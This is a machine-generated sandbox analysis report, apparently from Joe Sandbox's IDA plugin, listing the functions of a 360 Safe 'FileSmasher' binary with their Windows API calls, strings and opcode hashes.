Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Exception@8Throw$MutexObjectReleaseSingleValueWait
String ID: (bN
API String ID: 2684265641-263236600
Opcode ID: 5f0e588e48c08ab02f6248e17f99f286595809f4d50f82fe2e037bd39970f039
Instruction ID: 27f496866d8990fa095e078a65faca75cb8b74751a1e4995d36bfee892cf5d78
Opcode Fuzzy Hash: 5f0e588e48c08ab02f6248e17f99f286595809f4d50f82fe2e037bd39970f039
Instruction Fuzzy Hash: 3731FB71A002049BC710DFA8DC84AAEB7F8EB95774F244B6BE425E7390D73DD9018B99

Function 00484191 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 004841D1
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004841FB
GetSystemMetrics.USER32(00000000), ref: 00484212
GetSystemMetrics.USER32(00000001), ref: 00484219
MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,?,00000020), ref: 00484244

Strings

B, xrefs: 004841DB
DISPLAY, xrefs: 0048423B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: System$ByteCharMetricsMultiWide$InfoParameters
String ID: B$DISPLAY
API String ID: 381819527-3316187204
Opcode ID: d9b9575dddac45fce8a95556427a8d05b54b373614e490c01c5873537addd045
Instruction ID: 37ba2623ab80b836d71301728680889a1d878128fbe626e42cca22548f8401ec
Opcode Fuzzy Hash: d9b9575dddac45fce8a95556427a8d05b54b373614e490c01c5873537addd045
Instruction Fuzzy Hash: BC214CB1604322ABDF20AF10CC88B6F7B6CEF85761F104567FD159B185D678D840CBA8

Function 0047B0A0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0047B0AD
_malloc.LIBCMT ref: 0047B0D0
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 0047B0E7
VerQueryValueW.VERSION(?,\VarFileInfo\Translation), ref: 0047B10E
wnsprintfW.SHLWAPI ref: 0047B132

Part of subcall function 0048C860: __lock.LIBCMT ref: 0048C87E
Part of subcall function 0048C860: ___sbh_find_block.LIBCMT ref: 0048C889
Part of subcall function 0048C860: ___sbh_free_block.LIBCMT ref: 0048C898
Part of subcall function 0048C860: HeapFree.KERNEL32(00000000,00000104,004CCF20,0000000C,00498F03,00000000,004CD298,0000000C,00498F3D,00000104,?,?,0049F87E,00000004,004CD540,0000000C), ref: 0048C8C8
Part of subcall function 0048C860: GetLastError.KERNEL32(?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001,00000214), ref: 0048C8D9

Strings

\VarFileInfo\Translation, xrefs: 0047B100
\StringFileInfo\%04x%04x, xrefs: 0047B124

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FileInfoVersion$ErrorFreeHeapLastQuerySizeValue___sbh_find_block___sbh_free_block__lock_mallocwnsprintf
String ID: \StringFileInfo\%04x%04x$\VarFileInfo\Translation
API String ID: 1378052584-2356763208
Opcode ID: eb704cf59b5de3428d1fd2791184e9e73a67908085dc22da50989ae41f2f2d96
Instruction ID: 5ba37e5cbd69360c6c939176b68c2b169a7be7597d9ea379aba75c8afe8c24d0
Opcode Fuzzy Hash: eb704cf59b5de3428d1fd2791184e9e73a67908085dc22da50989ae41f2f2d96
Instruction Fuzzy Hash: 1F1186E26002017BD710AB2ADC95FE777ACEF90754F08496AF819C6242F778D918C6E6

Function 004246F0 Relevance: 12.2, APIs: 8, Instructions: 160COMMON

Download Yara Rule

APIs

GdipResetPath.GDIPLUS(?), ref: 0042471A
GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424751
GdipAddPathArcI.GDIPLUS(?,?,?), ref: 0042478D
GdipAddPathArcI.GDIPLUS(?,?,?), ref: 004247CB
GdipAddPathArcI.GDIPLUS(?,?,?), ref: 00424803
GdipClosePathFigure.GDIPLUS(?,?,?,?), ref: 00424812

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: GdipPath$CloseFigureReset
String ID:
API String ID: 1165678104-0
Opcode ID: 25ad8595897cfc011f22bd7f7509a9042fe7cdc94839624b9dd14a2432e1edd9
Instruction ID: d8f18a0501c3a013d271e56735f09573a319e5fd5543ef274777617e319d1d18
Opcode Fuzzy Hash: 25ad8595897cfc011f22bd7f7509a9042fe7cdc94839624b9dd14a2432e1edd9
Instruction Fuzzy Hash: B651A274A00120EF8B14EF69E989D6B7FB9EFC5350B40C55AE858DB248D734EC50CBA9

Function 0045E070 Relevance: 12.1, APIs: 8, Instructions: 95COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0045E07D
GetParent.USER32 ref: 0045E088
GetWindowRect.USER32(00000000), ref: 0045E08F

Part of subcall function 0047F630: MonitorFromRect.USER32(?,00000002), ref: 0047F638
Part of subcall function 0047F630: GetMonitorInfoW.USER32 ref: 0047F67A
Part of subcall function 0047F630: MulDiv.KERNEL32(00000014,?,00000064), ref: 0047F697
Part of subcall function 0047F630: OffsetRect.USER32(?,?,00000000), ref: 0047F6BE
Part of subcall function 0047F630: OffsetRect.USER32(?,00000000,?), ref: 0047F6D3
Part of subcall function 0047F630: OffsetRect.USER32(?,?,00000000), ref: 0047F6E8
Part of subcall function 0047F630: OffsetRect.USER32(?,00000000,?), ref: 0047F6FD

SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?,?,?), ref: 0045E0FC
ShowWindow.USER32(?,00000005,?,00000000,?,?,00000000,00000000,00000005,?,?,?,?), ref: 0045E105
SetWindowPos.USER32(?,000000FF,?,?,00000000,00000000,00000001,?,?,?,?), ref: 0045E128
ShowWindow.USER32(?,00000005,?,000000FF,?,?,00000000,00000000,00000001,?,?,?,?), ref: 0045E12D
SetWindowPos.USER32(?,000000FE,?,?,00000000,00000000,00000001,?,00000005,?,000000FF,?,?,00000000,00000000,00000001), ref: 0045E144

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Rect$Window$Offset$MonitorShow$ClientFromInfoParent
String ID:
API String ID: 3049569217-0
Opcode ID: 092bb2dce03e541efae5621312fcf8a15c56018c3c481612a977534922185c54
Instruction ID: 546e9c3f4b5c4d5a21c1283eb3a080c89236ab16e2df80ef0f790bdbc6c9b076
Opcode Fuzzy Hash: 092bb2dce03e541efae5621312fcf8a15c56018c3c481612a977534922185c54
Instruction Fuzzy Hash: 44313EB5E00219ABDF14CFB8DD49FEEBBB9EB48311F144259F911B3280D674A900CB64

Function 004244D0 Relevance: 12.1, APIs: 8, Instructions: 91memorywindowCOMMON

Download Yara Rule

APIs

GdipGetImageHeight.GDIPLUS(?,?), ref: 004244F5
GdipGetImageWidth.GDIPLUS(?,?,?,?), ref: 0042450C
GdipAlloc.GDIPLUS(00000010,?,?,?,?), ref: 0042451A
GdipGetImagePixelFormat.GDIPLUS(?,?,00000010,?,?,?,?), ref: 0042452D
GdipCreateBitmapFromScan0.GDIPLUS(?,?,00000000,?,00000000,?,?,?,00000010,?,?,?,?), ref: 00424554
GdipGetImageGraphicsContext.GDIPLUS(?,?,?,?,00000000,?,00000000,?,?,?,00000010,?,?,?,?), ref: 00424573
GdipDrawImageRectI.GDIPLUS(00000000,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,?,?,?), ref: 0042458B
GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,?,?,?,?,?,00000000,?,00000000,?,?), ref: 00424591

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$Image$Graphics$AllocBitmapContextCreateDeleteDrawFormatFromHeightPixelRectScan0Width
String ID:
API String ID: 2487541727-0
Opcode ID: 98d478eadfeba97cf78130aa386867eee6fd277fb74fb1945411d1a5806641a6
Instruction ID: e440d22e4396f5d12bb9ec9e6ce0b4ce439fd3521e5479917a7f6efb2c510700
Opcode Fuzzy Hash: 98d478eadfeba97cf78130aa386867eee6fd277fb74fb1945411d1a5806641a6
Instruction Fuzzy Hash: 1A2141B5A0011ABFDB10DFA9D881AAEF7F8FB54308F10856EF518D3200D674AD418BA5

Function 00434270 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 339COMMON

Download Yara Rule

APIs

GetClassLongW.USER32(?,000000E6), ref: 004342B6
SetClassLongW.USER32(?,000000E6,00000000), ref: 004342C3

Strings

%s%s, xrefs: 0043433F
default, xrefs: 00434318
T9N, xrefs: 00434308
$RN, xrefs: 004345E4

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: ClassLong
String ID: $RN$%s%s$T9N$default
API String ID: 582411763-3915848410
Opcode ID: 82f49b8d56515e79b7ac65b1c4c45f0a6013591393b387152726ec3e5e007b66
Instruction ID: 215032063d526a6b60c1858507d6e0e35a73955875a6123a1949ccb04bec6185
Opcode Fuzzy Hash: 82f49b8d56515e79b7ac65b1c4c45f0a6013591393b387152726ec3e5e007b66
Instruction Fuzzy Hash: C2C17931208341ABD710DF69C881B9BB7E4AFD9708F14491EF944AB391C778ED46CB9A

Function 0045E460 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 284threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0045E48B
EnterCriticalSection.KERNEL32(?), ref: 0045E49F
LeaveCriticalSection.KERNEL32(?), ref: 0045E4B7

Strings

IDS_MSG_TITLE, xrefs: 0045E592
FileSmasher\comfirmdlg.xml, xrefs: 0045E4FB
IDS_POP_LOGO_IMGID, xrefs: 0045E5F3

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CriticalSection$CurrentEnterLeaveThread
String ID: FileSmasher\comfirmdlg.xml$IDS_MSG_TITLE$IDS_POP_LOGO_IMGID
API String ID: 2351996187-460408531
Opcode ID: 423b19f3271c6dc9317d9b9952f69eb6d48c55b4bd3454dbdf34514be2d30294
Instruction ID: 1b0f27efa783b1bd38bf54292848568ffc2e723f9f63cdb7e22d6f21943f4c07
Opcode Fuzzy Hash: 423b19f3271c6dc9317d9b9952f69eb6d48c55b4bd3454dbdf34514be2d30294
Instruction Fuzzy Hash: F5A1C371204301AFE714DF66CC81F4B77E8AF59714F10452EFA04AB282E739E909CB9A

Function 004305F0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000007), ref: 00430624
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004307ED

Strings

%d:%s,%s, xrefs: 00430764
T9N, xrefs: 00430732
`, xrefs: 004306F1
pK, xrefs: 004308A2, 0043088A, 0043085D, 00430743, 0043065B, 00430869, 00430893, 004308AE

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandleWindow
String ID: %d:%s,%s$T9N$`$pK
API String ID: 3235909452-1085668790
Opcode ID: 9ab21ffd5fc9b75c3598339e9f366cbefc0aee2b9ed7909960e4dfc6bad1882d
Instruction ID: e060a5e3de00ca8db65478713cfe5ef3418896bd8cf46b1bc53b4f3ec04077e5
Opcode Fuzzy Hash: 9ab21ffd5fc9b75c3598339e9f366cbefc0aee2b9ed7909960e4dfc6bad1882d
Instruction Fuzzy Hash: 53A1907190024AEFDB04DF95C881B9EB7B4FF48314F14862EE815A7381D778AA45CBE4

Function 00401140 Relevance: 10.7, APIs: 7, Instructions: 151threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000,?), ref: 004011A8
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004011C4
_memset.LIBCMT ref: 004011FE
GetModuleFileNameExW.PSAPI(00000206,00000000,?,00000104), ref: 0040121B
__wcsicoll.LIBCMT ref: 00401248
CloseHandle.KERNEL32(?), ref: 00401319

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Process$CloseFileHandleModuleNameOpenThreadWindow__wcsicoll_memset
String ID:
API String ID: 3850109837-0
Opcode ID: 1ebfb01570c04af7837e6071bc580f8a2c768d9126c7d79c0051621b199221b4
Instruction ID: 27aa63842f8030bf761697287a2eab298ce15007b3ad5b061032a018a0cd6c16
Opcode Fuzzy Hash: 1ebfb01570c04af7837e6071bc580f8a2c768d9126c7d79c0051621b199221b4
Instruction Fuzzy Hash: E951C771904218ABDB20DF65DC49BAE77F8AF04314F1006EEE819F72D1DB789E848B59

Function 00428650 Relevance: 10.6, APIs: 7, Instructions: 141COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 004286D1
GdipSetTextRenderingHint.GDIPLUS(00000000,00000004,00000000,?,?,?,?,C1DE166F), ref: 00428705
GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?,C1DE166F), ref: 0042874C
GdipDeleteStringFormat.GDIPLUS(00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?,C1DE166F), ref: 0042879F
GdipDeleteBrush.GDIPLUS(?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?,?,?,?), ref: 004287A8
GdipDeleteFont.GDIPLUS(?,?,00000000,?,?,?,00000000,00000000,?,?,00000000,00000004,00000000,?), ref: 004287B1
GdipDeleteFontFamily.GDIPLUS(?,00000000,?,?,?,?,C1DE166F), ref: 004287BD

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Gdip$Delete$FontFormatString$BrushCopyCreateFamilyHintRectRenderingText
String ID:
API String ID: 3759438238-0
Opcode ID: df7aa3096c852ff0e68b98ebeccaf79c573fd760911f2fa3b6c2d8ae2d99ee80
Instruction ID: e3f0f0436f10e7231e6be9fae70369ccf633b2d8a1b7ff7d54ee89e77877cb73
Opcode Fuzzy Hash: df7aa3096c852ff0e68b98ebeccaf79c573fd760911f2fa3b6c2d8ae2d99ee80
Instruction Fuzzy Hash: 78513E71E01119EFCB04DFA5D880AEEBBB8FF48714F10815AE910AB240DB35AD15CBA4

Function 004A95F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004A9625

Part of subcall function 004A9590: _vswprintf_s.LIBCMT ref: 004A95C3

_memset.LIBCMT ref: 004A96CB
_strncat.LIBCMT ref: 004A974F
_memset.LIBCMT ref: 004A976C
__strlwr.LIBCMT ref: 004A9787

Strings

%02x, xrefs: 004A96E5

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset$__strlwr_strncat_vswprintf_s
String ID: %02x
API String ID: 259801040-560843007
Opcode ID: 8b4544a2694d99a644f11401f63856650bef223980d01b7eabe1400d219d4164
Instruction ID: dc938623906d13e518d07486095b92e93d5df9dabc9981a940d2c667bfff8335
Opcode Fuzzy Hash: 8b4544a2694d99a644f11401f63856650bef223980d01b7eabe1400d219d4164
Instruction Fuzzy Hash: C941C3715083459BD334DF35C895FEB77E8EF9A304F10491EF69987142EA3499088BA6

Function 004340F0 Relevance: 10.6, APIs: 7, Instructions: 128windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(00000000), ref: 0043416B
GetMessagePos.USER32 ref: 0043417A
ScreenToClient.USER32(00000000,?), ref: 00434198
CopyRect.USER32(?,?), ref: 004341C3
SetFocus.USER32(00000000,?,?), ref: 004341DF
PostMessageW.USER32(00000000,00000787,00000000,00000000), ref: 00434212
SendMessageW.USER32(00000000,00000200,00000001,00000000), ref: 00434221

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339318599.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339338378.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339349997.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339362931.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339384348.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339398392.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3339413386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: Message$ClientCopyFocusPostRectScreenSendVisibleWindow
String ID:
API String ID: 2748411872-0
Opcode ID: 279e5d58f11e983977a9a209ef140a337322d0b1437d670832ec6569d8cc7733
Instruction ID: b2dacfc8fa355c76718d6420920e3f16cb606e0aee05ae2445eece695ce4b699
Opcode Fuzzy Hash: 279e5d58f11e983977a9a209ef140a337322d0b1437d670832ec6569d8cc7733
Instruction Fuzzy Hash: CD414F71600205AFEB14DF55CC84FAB77A8EF99350F10865AF915AB390DB34ED01CB64

Function 004AA520 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 123stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004AA56C
SHGetValueA.SHLWAPI(80000002,Software\360Safe\Liveup,mid,?,?,?,?,00000400), ref: 004AA595
_memset.LIBCMT ref: 004AA642
lstrcmpiA.KERNEL32(?,?), ref: 004AA66A

Strings

mid, xrefs: 004AA586
Software\360Safe\Liveup, xrefs: 004AA58B

Memory Dump Source

Source File: 00000000.00000002.3339266864.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3339255202.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
